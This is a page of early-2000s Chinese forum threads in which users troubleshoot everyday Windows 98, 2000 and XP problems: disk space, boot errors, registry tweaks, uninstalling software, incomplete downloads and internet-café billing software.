阿奇 超级用户 积分：398 发帖：316 来自：火星 注册：2000-08-30 | 发表于 2002-01-12 21:18:44 按此观看阿奇的个人资料 按此发邮件给阿奇 访问阿奇的主页 阿奇 的 oicq 是498391,查看 498391 的资料 发送悄悄话给阿奇 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿奇的IP 我想就是xp得系统备份功能 关掉吧 -------------------------------- SIW { http://aqi.126.com } { http://designhouse.cc.net.cn } ----------------------------------
imacwei 终级用户 积分：2243 发帖：1041 来自：China.Jiangs 注册：2001-07-23 | 发表于 2002-01-13 18:59:10 按此观看imacwei的个人资料 按此发邮件给imacwei 访问imacwei的主页 imacwei 的 oicq 是36110975,查看 36110975 的资料 发送悄悄话给imacwei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看imacwei的IP 不光是那个备份，还有那个电源管理也浪费很多空间的，另外把虚拟内存放到别的盘里，会好很多！ Loading………… WINDOWS2000-SP2+IE5.5 FIREWORKS,the solution for professional Web graphic design and production. Press Anykey To Continue… iMacWei
wangq 硅基帝国中尉 积分：1694 发帖：997 来自：硅基帝国 注册：2000-11-18 | 发表于 2002-01-14 09:00:08 按此观看wangq的个人资料 按此发邮件给wangq 访问wangq的主页 wangq 的 oicq 是1190909,查看 1190909 的资料 发送悄悄话给wangq 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wangq的IP 转移虚拟内存后释放出了 400Mb 关闭系统备份没见反应 至于电源管理是怎么个弄发 imacwei 可不可以说说？ http://wangq.myrice.com #@%$#^@%&^#% 爱巢.鸟蛋
wangq 硅基帝国中尉 积分：1694 发帖：997 来自：硅基帝国 注册：2000-11-18 | 发表于 2002-01-14 09:07:17 按此观看wangq的个人资料 按此发邮件给wangq 访问wangq的主页 wangq 的 oicq 是1190909,查看 1190909 的资料 发送悄悄话给wangq 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wangq的IP 删除废弃临时文件 400Mb 卸载 Microsoft Plus! 找回120Mb 总算有1G 空间了 不过离几天前的2 .2G 还多了800Mb 一个星期怎么会有这么垃圾？？ http://wangq.myrice.com #@%$#^@%&^#% 爱巢.鸟蛋
redtulip 高级用户 积分：208 发帖：106 来自： 注册：2001-12-19 | 发表于 2002-01-14 18:40:41 按此观看redtulip的个人资料 按此发邮件给redtulip redtulip 的 oicq 是7701927,查看 7701927 的资料 发送悄悄话给redtulip 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看redtulip的IP 朋友，也许你可以选择游击战方法，所有需要用的软件都安装过后，ghost一个备份，每阁5天ghost回来一次，这样系统就总处在“雏”的状态，俺就是这么做地。（另：ghost几遍之后系统还是慢的象牛一样，建议重新安装，哈哈哈哈。） 多谢，多谢！
redtulip 高级用户 积分：208 发帖：106 来自： 注册：2001-12-19 | 发表于 2002-01-14 18:45:44 按此观看redtulip的个人资料 按此发邮件给redtulip redtulip 的 oicq 是7701927,查看 7701927 的资料 发送悄悄话给redtulip 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看redtulip的IP 另外在控制面版——管理工具——服务选项中可以去掉一些不用的功能，这样可以节省不少内存空间，xp的后台程序简直太多了。但要小心改动服务选项，改不好就象改注册表一样会造成系统瘫痪，结果就是重装。 多谢，多谢！
上一贴 | 下一贴
快速回复 | 主题：我的天 xp 简直就是硬盘杀手
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


e个小问题。。~~

计算机技术
e个小问题。。~~

上一贴 | 下一贴
发表人 | 主题: e个小问题。。~~
foolishdog 终级用户 积分：672 发帖：177 来自：阳光数据中文网 注册：2001-08-16 | 发表于 2002-01-14 09:02:27 按此观看foolishdog的个人资料 该用户不允许显示它的电子邮件 foolishdog 的 oicq 是84357477,查看 84357477 的资料 收藏该主题供以后查看 发送悄悄话给foolishdog 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看foolishdog的IP 我的机的配置是：PIII；256M rom，太阳花32M显卡，17" 纯平显示器。win98系统，主要用来做图片，98有个不是很好的东西，就是一启动就会有一个对话框，要求输入密码~ 怎样去掉？~ 设计就是灵感的实物！ 灵感是设计的动力！
2smile 活着就好 积分：1622 发帖：1907 来自：SD 注册：2001-05-13 | 发表于 2002-01-14 09:38:12 按此观看2smile的个人资料 按此发邮件给2smile 访问2smile的主页 发送悄悄话给2smile 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2smile的IP 在网络属性里选择windows登录 想见不如怀念? thinktip.com msn: thinktip@hotmail.com icq: 98885338
foolishdog 终级用户 积分：672 发帖：177 来自：阳光数据中文网 注册：2001-08-16 | 发表于 2002-01-16 11:11:51 按此观看foolishdog的个人资料 该用户不允许显示它的电子邮件 foolishdog 的 oicq 是84357477,查看 84357477 的资料 发送悄悄话给foolishdog 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看foolishdog的IP 呵呵~~~~~~ 已经搞锭~~ 谢谢~~ 你们说我的机子的配制还算合理不咯？ 我在听Mp3的时候打开PS时，mp3还是断点的~~ 不爽~~ ！ 有什么解决呢~~~~~~？ 设计就是灵感的实物！ 灵感是设计的动力！
上一贴 | 下一贴
快速回复 | 主题：e个小问题。。~~
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


[无法自动进入win98求教高手]::告诉大家已经解决!::

计算机技术
[无法自动进入win98求教高手]::告诉大家已经解决!::

上一贴 | 下一贴
发表人 主题: [无法自动进入win98求教高手]::告诉大家已经解决!::
silence112

终级用户
积分：1622
发帖：456
来自：川人在浙江
注册：2001-06-04
 发表于 2002-01-15 20:21:41 按此观看silence112的个人资料 按此发邮件给silence112 访问silence112的主页 silence112 的 oicq 是28825855,查看 28825855 的资料 收藏该主题供以后查看 发送悄悄话给silence112 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看silence112的IP
我的电脑在操作过程中死机，重启后，便无法自动进入windows
    提示错误为：

    c:\>

    vmm32.vxd is required to run windows
    if this file is not in your path,you may need to reinstall windows.

    但此时如果输入:
    C:\>cd windows
    C:\windows>win.com

    便可以进入win98了，这是什么原因引起的，
    我应该怎么办啊？？

    在下先道谢了！！

[这消息被silence112编辑过(编辑时间2002-01-17 10:46:22)]

---+好好学习,天天上网+---
cjj31

方与圆
积分：2971
发帖：1044
来自：浙江嘉兴
注册：2000-07-05
 发表于 2002-01-15 20:45:09 按此观看cjj31的个人资料 按此发邮件给cjj31 cjj31 的 oicq 是7777435,查看 7777435 的资料 发送悄悄话给cjj31 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cjj31的IP
修复安装，不知道能不能解决？

我笨故我菜！

好好学习，天天向上!

silence112

终级用户
积分：1622
发帖：456
来自：川人在浙江
注册：2001-06-04
 发表于 2002-01-15 20:57:39 按此观看silence112的个人资料 按此发邮件给silence112 访问silence112的主页 silence112 的 oicq 是28825855,查看 28825855 的资料 发送悄悄话给silence112 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看silence112的IP
cjj31在上个帖子中说
引用:
修复安装，不知道能不能解决？

怎么个修复方法，烦劳你详细说一下！！
我的机子是戴尔的品牌机，它有一张赠送的98se光盘。
但我拿来不知怎么修复。：（

---+好好学习,天天上网+---
cjj31

方与圆
积分：2971
发帖：1044
来自：浙江嘉兴
注册：2000-07-05
 发表于 2002-01-15 21:02:37 按此观看cjj31的个人资料 按此发邮件给cjj31 cjj31 的 oicq 是7777435,查看 7777435 的资料 发送悄悄话给cjj31 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cjj31的IP
和重装一样！

98安装盘和现在机器上装的98要相同。

我笨故我菜！

好好学习，天天向上!

silence112

终级用户
积分：1622
发帖：456
来自：川人在浙江
注册：2001-06-04
 发表于 2002-01-16 12:54:44 按此观看silence112的个人资料 按此发邮件给silence112 访问silence112的主页 silence112 的 oicq 是28825855,查看 28825855 的资料 发送悄悄话给silence112 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看silence112的IP
cjj31在上个帖子中说
引用:
和重装一样！
98安装盘和现在机器上装的98要相同。
我试了，在读取文件后总是说什么非法操作，然后点确定，就跳出安装程序了！！
我在机子上查找，在C:\windows\system下分明有vmm32.vxd这个文件啊！！
    这是怎么回事呢？？

    我想，既然要运行C:\windows\win.com这个文件，
    那我让它启动时自动运行如何，于是在C:\autoexec.bat这个文件里的末尾我加了一行，如下：

    @if exist C:\WININST0.400\SuWarn.Bat call C:\WININST0.400\SuWarn.Bat
    @if exist C:\WININST0.400\SuWarn.Bat del C:\WININST0.400\SuWarn.Bat
    REM [Header]

    REM [CD-ROM Drive]
    REM C:\WINDOWS\COMMAND\MSCDEX /D:MSCD001

    REM [Miscellaneous]

    REM [Display]

    SET PATH=C:\WINDOWS\SYSTEM\WBEM;C:\DMI\WIN32\BIN;C:\PROGRA~1\ULTRAE~1
    SET PATH=%PATH%;C:\PROGRA~1\ULTRAE~1
    SET PATH=C:\WINDOWS\SYSTEM\WBEM;C:\PROGRA~1\ULTRAE~1;

    SET PATH=C:\WINDOWS(左边这一行是我加上去的)

    这样重启后，就能进入win98了，但新的问题来了，这样进去的win98系统跟安全模式差不多，（但确实不是安全模式）颜色和分辨率都很低。在我的电脑中查看硬件配置，只有最基本的几个，网卡声卡等等都找不到。

     所以我现在越来越糊涂了。唉，求教大家了！！

---+好好学习,天天上网+---
bxzh2000

初级用户
积分：11
发帖：3
来自：
注册：2001-12-05
 发表于 2002-01-16 19:46:34 按此观看bxzh2000的个人资料 按此发邮件给bxzh2000 bxzh2000 的 oicq 是64432664,查看 64432664 的资料 发送悄悄话给bxzh2000 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bxzh2000的IP
格了，重装
silence112

终级用户
积分：1622
发帖：456
来自：川人在浙江
注册：2001-06-04
 发表于 2002-01-17 10:43:56 按此观看silence112的个人资料 按此发邮件给silence112 访问silence112的主页 silence112 的 oicq 是28825855,查看 28825855 的资料 发送悄悄话给silence112 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看silence112的IP
告诉各位，我的问题在小熊在线的一位曾碰到同样问题的朋友帮助下解决了。
方法是把C:\根目录下的两个文件:autoexec.bat和config.sys移动到别处或者删除，就成了！！
但是其中原理我还不太明白。
如果有谁知道，我也更愿意听听！！

终于又能正常进入win98了，太高兴了~~~~~

---+好好学习,天天上网+---
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2002-01-17 10:55:14 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
silence112在上个帖子中说
引用:
但是其中原理我还不太明白。
如果有谁知道，我也更愿意听听！！

我想应该是你以前装了某些软件，那些软件需要在系统启动时进行一些配置或自动运行，就修改你的autoexec.bat（好象vc就是这样），然后你又把那些软件删了，而autoexec.bat没有改回来，所以找不到文件，无法启动。
我猜的，不一定对

Blueidea Web Team.
Moderator Of Computer Technology Forum
sony

终级用户
积分：965
发帖：264
来自：浙江省
注册：2001-10-05
 发表于 2002-01-17 20:44:34 按此观看sony的个人资料 按此发邮件给sony sony 的 oicq 是27869008,查看 27869008 的资料 发送悄悄话给sony 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sony的IP
还不就是两个帮助启动的文件!

许多夜晚，你轻柔地依偎在我的身上，用纤纤秀手触摸我身上娇嫩的地方，用小巧细嘴吸出我珍贵的体液，直到满足十分才肯松口离开，唉，这该死的蚊子。
上一贴 | 下一贴
快速回复 | 主题：[无法自动进入win98求教高手]::告诉大家已经解决!::
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


2000怎么加速访问局域网中的98

计算机技术
2000怎么加速访问局域网中的98

上一贴 | 下一贴
发表人 | 主题: 2000怎么加速访问局域网中的98
CrazyParty 群山之巅 积分：2164 发帖：811 来自：温州 注册：2000-10-14 | 发表于 2002-01-22 12:19:07 按此观看CrazyParty的个人资料 按此发邮件给CrazyParty 收藏该主题供以后查看 发送悄悄话给CrazyParty 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看CrazyParty的IP 如题，修改注册表的哪里？或者有什么工具？谢谢! 这是一个0和1组成的世界，是她的世界，与我的世界截然不同，她的名字叫……
51windows 海娃 积分：2284 发帖：682 来自：湖南－山东 注册：2001-12-02 | 发表于 2002-01-22 17:13:03 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP 国外最新流传开一个小帖士（其实是一个BUG补丁而已），可以令你的Windows 2000浏览速度加快很多哦！大家在通过网络系统浏览共享文件时，大概都会要等上30秒钟。这其实是因为Win 2000的一个设置有个BUG，一定要先在“计划任务”里搜索，再找出共享文件。而我们提到的这个小帖士就是专门修补这个BUG的，如果做一些改动的话，Win 2000的用户就会发现，无论是互联网还是视窗浏览的速度都有了很显著的提高。下面就是具体的方法啦： 打开注册表点击到： HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Explorer/RemoteComputer/NameSpace 在其分栏出选择键值： {D6277990-4C6A-11CF-8D87-00AA0060F5BF} 然后就删除它。 因为就是这个健值引导Windows去搜索“计划任务”。当然如果你觉得有必要你可以保存下序列号以备不时之需。这个补丁非常有效，不需要重新开机，几乎即刻就可以感受到你的浏览程序快了很多！ 我的网站上就有!去看看 http://202.102.4.31/51windows/windows/2000/ Blueidea Web Team. Moderator Of Amphitheater Forum .::天天学习:好好向上::. www.51windows.com 系统出问题了?请看！
kacji 终级用户 积分：942 发帖：266 来自：活火熔城 注册：2001-08-14 | 发表于 2002-01-24 04:32:00 按此观看kacji的个人资料 按此发邮件给kacji 发送悄悄话给kacji 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kacji的IP 这个问题微软的官方解释是： 直接在地址栏中输入一个资源的绝对地址，如：\\work1\c\windows 大梦谁先觉 平生我自知 草堂春睡足 窗外日迟迟
上一贴 | 下一贴
快速回复 | 主题：2000怎么加速访问局域网中的98
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


彻底删除DW和FW的方法?(添删项里没有该程序，本身也不带）

计算机技术
彻底删除DW和FW的方法?(添删项里没有该程序，本身也不带）

上一贴 | 下一贴
发表人 | 主题: 彻底删除DW和FW的方法?(添删项里没有该程序，本身也不带）
haibei 初级用户 积分：129 发帖：46 来自：常州 注册：2001-12-06 | 发表于 2001-12-09 12:06:48 按此观看haibei的个人资料 按此发邮件给haibei haibei 的 oicq 是57066261,查看 57066261 的资料 收藏该主题供以后查看 发送悄悄话给haibei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看haibei的IP 我这样删除不知对否？各位大虾请指点。 1。打开我的电脑C:\WINDOWS\Start Menu\Programs目录下找到这两个程序图标直接删除。 2。删除桌面上所有快捷方式图标。 我这样重新安装对否？ 1。先安装FW英文版，后安装汉化。 2.安装DW中文版。 活到老 学不了
myhyli 现任版主 积分：20379 发帖：4790 来自： 注册：2000-07-22 | 发表于 2001-12-09 12:15:45 按此观看myhyli的个人资料 按此发邮件给myhyli 发送悄悄话给myhyli 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看myhyli的IP 那你安装的这个版本有点问题，或者你安装的方法不对，一般应该是会出现在添加删除程序里面的 那除了删除程序本身外，还需要到注册表里去删除一切和dreamweaver和firework有关的项和键值 Myhyli www.blueidea.com/user/myhyli Blueidea Web Team Moderator Of Dreamweaver & Javascript
yuzhiqing 终级用户 积分：682 发帖：417 来自：中国湖北 注册：2001-04-01 | 发表于 2001-12-09 21:24:30 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP 用软件 regclean 和优化大师结合,删除!~ WINDFLASH ::浅紫色FORUM::
上一贴 | 下一贴
快速回复 | 主题：彻底删除DW和FW的方法?(添删项里没有该程序，本身也不带）
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


急，如何解压这种格式的文件

计算机技术
急，如何解压这种格式的文件

上一贴 | 下一贴
发表人 | 主题: 急，如何解压这种格式的文件
bluedreamboy 超级用户 积分：380 发帖：104 来自：福建-BJ 注册：2001-08-04 | 发表于 2001-12-08 19:41:14 按此观看bluedreamboy的个人资料 按此发邮件给bluedreamboy 访问bluedreamboy的主页 bluedreamboy 的 oicq 是21038669,查看 21038669 的资料 收藏该主题供以后查看 发送悄悄话给bluedreamboy 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bluedreamboy的IP database.zip.JC! 我是用来学数据库的数据，可惜用winzip打不开！！ ===摒住了呼吸像沉入深海，凝视你竟然没有一句对白，怕一眨眼一切都不存在===
DW5 阻击之眼 积分：2678 发帖：2517 来自：blueidea 注册：2001-07-29 | 发表于 2001-12-08 20:30:34 按此观看DW5的个人资料 按此发邮件给DW5 DW5 的 oicq 是48580488,查看 48580488 的资料 发送悄悄话给DW5 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DW5的IP 倒！这是网络快车还没有下载完的文件，用网络快车打开它，把它下载完就可以打开了 永远走在时代的最前端。。。 Blueidea Cs Team Team Nicker -]Blueidea[- Y.DW5
bluedreamboy 超级用户 积分：380 发帖：104 来自：福建-BJ 注册：2001-08-04 | 发表于 2001-12-09 10:14:16 按此观看bluedreamboy的个人资料 按此发邮件给bluedreamboy 访问bluedreamboy的主页 bluedreamboy 的 oicq 是21038669,查看 21038669 的资料 发送悄悄话给bluedreamboy 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bluedreamboy的IP 可是我明明看到下载到100％ ===摒住了呼吸像沉入深海，凝视你竟然没有一句对白，怕一眨眼一切都不存在===
imacwei 终级用户 积分：2243 发帖：1041 来自：China.Jiangs 注册：2001-07-23 | 发表于 2001-12-09 16:12:54 按此观看imacwei的个人资料 按此发邮件给imacwei 访问imacwei的主页 imacwei 的 oicq 是36110975,查看 36110975 的资料 发送悄悄话给imacwei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看imacwei的IP 看到100％并不一定是完成了，他要将文件重组的，你再重新连接上去，让他自己完成！ Loading………… WINDOWS2000-SP2+IE5.5 FIREWORKS,the solution for professional Web graphic design and production. Press Anykey To Continue… iMacWei
Fly Developer 积分：3998 发帖：995 来自： 注册：2001-10-31 | 发表于 2001-12-09 19:26:10 按此观看Fly的个人资料 按此发邮件给Fly Fly 的 oicq 是7969660,查看 7969660 的资料 发送悄悄话给Fly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Fly的IP 试试将.jc删除掉只用.exe 我的虚荣心是用十句话说出别人用一本书讲出的东西和别人用一本书没有讲出的东西. ----尼采
yuzhiqing 终级用户 积分：682 发帖：417 来自：中国湖北 注册：2001-04-01 | 发表于 2001-12-09 21:09:21 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP 这个文件应该还在你的快车里面,让它下完吧,如果再打不开,说明这个文件不可用!~ WINDFLASH ::浅紫色FORUM::
上一贴 | 下一贴
快速回复 | 主题：急，如何解压这种格式的文件
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


PWS

计算机技术
PWS

上一贴 | 下一贴
发表人 | 主题: PWS
过雪无痕 高级用户 积分：223 发帖：65 来自： 注册：2001-12-03 | 发表于 2001-12-07 19:33:08 按此观看过雪无痕的个人资料 按此发邮件给过雪无痕 访问过雪无痕的主页 过雪无痕 的 oicq 是35865183,查看 35865183 的资料 收藏该主题供以后查看 发送悄悄话给过雪无痕 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看过雪无痕的IP 我想学学ASP可是我手头没有WIN98的安装盘.请问到那里能够下载到.谢谢! 虽然我很笨！但是我好学。望多多指教！谢谢：） http://go3.163.com/tomjon
嘿嘿 坏笑 积分：403 发帖：524 来自： 注册：2001-10-06 | 发表于 2001-12-07 21:02:38 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP 这种软件可能不能提供下载网址，建议你真的想学的话还是装2000吧，用IIS。（PWS经常出现连接用户过多的提示，很烦。） 缘是天定,份在人为.
lzrone 初级用户 积分：107 发帖：51 来自： 注册：2001-03-18 | 发表于 2001-12-08 01:34:30 按此观看lzrone的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给lzrone 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看lzrone的IP 软件万花筒精品软件里有 **************************** 星空依旧灿烂
火鸟王 终级用户 积分：473 发帖：274 来自：盈动数码 注册：2000-08-22 | 发表于 2001-12-08 13:33:21 按此观看火鸟王的个人资料 按此发邮件给火鸟王 访问火鸟王的主页 发送悄悄话给火鸟王 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看火鸟王的IP 如果是瘟酒巴的话，还是用PWS。 本机调试ASP，CGI还是很方便的。 如果你用的是WIN2000 SERVER的话，IIS就在里面。 有些WIN98盘的ADD-ONES目录内有一个PWS目录，安装文件就在那个里面。 千淘万漉虽辛苦，吹尽狂沙始到金。
过雪无痕 高级用户 积分：223 发帖：65 来自： 注册：2001-12-03 | 发表于 2001-12-09 12:10:40 按此观看过雪无痕的个人资料 按此发邮件给过雪无痕 访问过雪无痕的主页 过雪无痕 的 oicq 是35865183,查看 35865183 的资料 发送悄悄话给过雪无痕 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看过雪无痕的IP 谢谢你们了. 虽然我很笨！但是我好学。望多多指教！谢谢：） http://go3.163.com/tomjon
上一贴 | 下一贴
快速回复 | 主题：PWS
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


网吧里会员的帐号的上金额变$$$$

计算机技术
网吧里会员的帐号的上金额变$$$$

上一贴 | 下一贴
发表人 | 主题: 网吧里会员的帐号的上金额变$$$$
starsjz 依石 积分：2148 发帖：635 来自：杭州 注册：2001-06-13 | 发表于 2001-12-08 17:10:42 按此观看starsjz的个人资料 按此发邮件给starsjz starsjz 的 oicq 是9093911,查看 9093911 的资料 收藏该主题供以后查看 发送悄悄话给starsjz 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看starsjz的IP 我的网吧里会员的帐号的上金额变成了负几百元！而且有些减少的多,有些减少的少,减少的数额不一样! 我用的是万象幻境 有谁碰到过这样的情况?帮忙解决一下 过好每一天~~ 期待、等待
lzrone 初级用户 积分：107 发帖：51 来自： 注册：2001-03-18 | 发表于 2001-12-09 13:26:37 按此观看lzrone的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给lzrone 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看lzrone的IP 把会员数据备份一下，然后试把万象重装一下，最好的话，把系统重装看看 **************************** 星空依旧灿烂
ytmgm2001 初级用户 积分：71 发帖：55 来自：湖南－土匪窝 注册：2001-05-26 | 发表于 2001-12-09 13:36:05 按此观看ytmgm2001的个人资料 按此发邮件给ytmgm2001 ytmgm2001 的 oicq 是4650148,查看 4650148 的资料 发送悄悄话给ytmgm2001 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ytmgm2001的IP 万象幻境，破解版的一个BUG，备份现有的数据。（也就只一个文件），然后到注册表里面把它所用到的信息全部删除。重装就可以了！ 我以前碰到过！ 一个想不断超越本性的自我!!努力的为变更着自己的个性而努力!不为别的，只为能好好过活点
阴天 初级用户 积分：0 发帖：1 来自：河北 注册：2001-12-05 | 发表于 2001-12-10 11:16:58 按此观看阴天的个人资料 按此发邮件给阴天 阴天 的 oicq 是99815644,查看 99815644 的资料 发送悄悄话给阴天 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阴天的IP 我怎么觉得是被人恶意修改的啊？万象幻境的密码和其数据库的密码都太容易被破解了，调出其中的数据库也是件相当容易的事情，小心吧。还是经常做备份好，注意安全啊。 在网海里畅游，自己的技术越来越差，快要淹死啦~！
上一贴 | 下一贴
快速回复 | 主题：网吧里会员的帐号的上金额变$$$$
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


请问，WINDOWS98中的MSCONFIG这个命令。。

计算机技术
请问，WINDOWS98中的MSCONFIG这个命令。。

上一贴 | 下一贴
发表人 | 主题: 请问，WINDOWS98中的MSCONFIG这个命令。。
afu 初级用户 积分：8 发帖：4 来自： 注册：2001-11-21 | 发表于 2001-12-18 15:38:39 按此观看afu的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给afu 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看afu的IP 请问，WINDOWS98中的MSCONFIG这个命令在WINDOWS2000里面换成什么了???
audreys 终级用户 积分：658 发帖：175 来自：js.lyg 注册：2000-11-07 | 发表于 2001-12-18 16:08:48 按此观看audreys的个人资料 按此发邮件给audreys 访问audreys的主页 audreys 的 oicq 是57659189,查看 57659189 的资料 发送悄悄话给audreys 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看audreys的IP 在2000里没有这样的程序了，不过可以改注册表呀 痛并傻笑着！
赵鹏 初级用户 积分：9 发帖：1191 来自：福建福州 注册：2001-04-02 | 发表于 2001-12-18 16:19:47 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP 可以把98下的Msconfig.exe直接在win2000中使用 就是开始的时候会出现4个错误提示 其他的都可以使用 去年元夜时 花市灯如昼 月上柳梢头 人约黄昏后 今年元夜时 月与灯依旧 不见去年人 泪湿青衫袖
afu 初级用户 积分：8 发帖：4 来自： 注册：2001-11-21 | 发表于 2001-12-20 19:47:29 按此观看afu的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给afu 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看afu的IP thx!
上一贴 | 下一贴
快速回复 | 主题：请问，WINDOWS98中的MSCONFIG这个命令。。
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


请教SQL Server 2000的安装

计算机技术
请教SQL Server 2000的安装

上一贴 | 下一贴
发表人 主题: 请教SQL Server 2000的安装
bjSun

初级用户
积分：69
发帖：31
来自：中国北京
